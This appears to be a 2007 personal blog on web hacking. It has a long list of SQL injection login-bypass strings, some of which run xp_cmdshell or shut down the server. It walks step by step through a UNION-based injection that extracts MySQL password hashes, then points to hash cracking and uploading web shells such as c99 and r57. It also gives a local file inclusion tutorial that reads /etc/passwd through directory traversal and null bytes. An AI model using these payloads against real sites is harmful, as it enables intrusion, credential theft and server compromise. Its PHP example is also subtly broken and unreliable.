pass= '' or ''=''

- Login: hi' or 1=1--
- pass: hi' or 1=1--


Username: '; shutdown with nowait; --

Username: '; exec master..xp_xxx; --

Username: '; exec master..xp_cmdshell 'iisreset'; --


username = admin' or '6'='6




' or ''='

"'or''='"

'or"='

9,9,9

' or '

or 1=1?

or 1=1 --'

' or 'a'='a

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

' or 'x'='x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

Chintan ' --

Chintan " --

' OR 1=1 ?

hi' or 'a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

admin' or a=a --

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

These are about enough, so test your login pages and drop me a mail, incase u find these helpful.

Good weekend,

/Chuks

Wednesday, April 18, 2007

SQL INJECTIONS

This is a vulnerability alot of hackers use, when attacking webservers. By webservers in mean, applications running IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about sql injection, there ara alot of white papers on the net that can really help. See these pages,

http://www.acunetix.com/websitesecurity/sql-injection.htm


http://www.securiteam.com/securityreviews/5NP011FIUG.html

http://www.securiteam.com/securityreviews/5IP030K8AA.html

http://unixwiz.net/techtips/sql-injection.html

http://www.owasp.org/index.php/PHP_Top_5

And many others online

lets take an example on php, aite?

Let say our site is www.sitevulnerable.com/index.php
Index php is vulnerable to sql injection. So how would we attack. www.sitevulnerable.com/index.php?id=-1

Maybe u are asking me why 1, you can use any number 1010101, wateva

The inject above may give an error, and actually these errors are the one i will use to pick up passwords, tables etc.

So we go on by enumerating the tables

www.sitevulnerable.com/index.php?id=-1 union select 1/*

We are using /* to close the query so as to grep in db.

So we will continue adding up like this until we get an output that will help us.

www.sitevulnerable.com/index.php?id=-1 union select 1,2/*

Remember with this we are just grep db of id 1, which probably is root

www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*

and then i get an error like

3

1


We are still rolling........

So i will inject a crafted query like this


www.sitevulnerable.com/index.php?id=-1union select 4,DATABASE(),2,USER()/*

And the error i get will be the user name in the DB.

root@localhost

So lets grep the password from the db

www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*

And our error is

localhost

500372d40e775a87

Now that is an encrypted mysql hash, which can be bruteforced by using john the ripper.

Download from here


http://www.openwall.com/john/

So if i get the password, how will i log in to db and upload my files?

Simple, get a running shell, like c99shell, c100, r57 etc etc, they are all over the internet

A simple screenshot is done below.







Hope this helped, signing off,

/Chuks

Tuesday, April 17, 2007

EXPLAINING CONTENT MANAGEMENT SYSTEMS

A content management system is an application that is accessed with a webbrowser (mozilla firefox, Opera, konqueror etc) over a network like Internet or through the intranet. We actually call them webapplications.and thats where we start talking about webapplication security.

We use these webaplications for webmails, online retail sales, online auctions, wikis, weblogs, discussion boards(forums) and alot of others.

Content Management System simplifies the work of the administrators on a site, when it comes to stuff like editing processes, creating, translations, publishing, archiving and alot more better services.

Errors and bugs found are released everyday including hacked frameworks, new and zero day exploits, and people are made aware of them and patches released. To learn more about webapplication security, you can check www.webappsec.org, a site i always visit several times a day. Others are like www.owasp.org, www.spidynamics.com, www.acunetix.com, www.cgisecurity.com

Most of the Content Management Softwares i know of, are opensource, so free for anybody who wants to have a website which really sings..........

/Chuks

Thursday, April 12, 2007

LOCAL FILE INCLUSION


LOCAL FILE INCLUSION

Local file inclusion is when you view 1 of the remote systems local files through one of their web based scripts normally, e.g. victimsite.com/vulnerablescript.php?script=../../../../../../../etc/passwd? which if on a unix/Linux system will bring up the passwd file.

Its normally found in webapplications who's input isn't sanitised properly.http://www.victim.com/vulnerablescript.php=2

Now this is like a GET parameter request for 2 on the above URL. Lfi works with the following


- Nullbytes: %00
- Directory transversal: /../

Lets assume the vulnerable script looks as this;

$file=$_GET["file"]; //Get parameter
include(".vuln/$vulnerable.php") //include Get parameter with folder prefix
?>



As we all know, the GET parameter is passed to the include fuction, which then loads the file, linking up to the full path; /home/www/anotherfile/application/vulnerablescript.php

Even, as far as PHP is concerned, it has a way of allowing upload of files to the box template folder, which will turn from LFI to RFI. RFI is a short name of Remote File Inclusion. This will happen if allow_url_fopen is enabled, which due to these vulnerabilities, it will be disabled in PHP 6. You can read more about uploading in php here, http//au.php.net/manual/en/features.file-upload

So to check if our exploit works we load up the vulnerable script up the url, and feed in a LFI, check this out.....

www.victimsite.com/vulnerablescript.php=../vulnerablescript.php

......and if it reloads, the site is vulnerable to LFI

What will happen in the background is something like this

/home/www/anotherfile/application/vuln/../vulnerablescript.php

Now this is a simple directory transversal

Nullbytes come into play if .php is closed up to the file and helps to ignore everything except %00, so if u do vulnerablescript.php%00, everything after .php is ignored.

Remember most of our sites have so many security holes u would be amazed, especially if the box is in the same LAN the company or the institution is. Another way of acting gone in 60 seconds huh!

The screenshot below shows an LFI.


Will be writing more soon on websecurity.

/Chuks

Wednesday, April 11, 2007

IT SECURITY IN MY COUNTRY

Hi.

In my country computer security is not much of an issue, as far as Administration is concerned. You will find how simpler to break in and how Vulnerable big companies and Government institution networks are. So i wish to use this blog to address I.T security and Web Security as a whole. How far can a rabbit hole be and a little on Exploits and Vulnerability.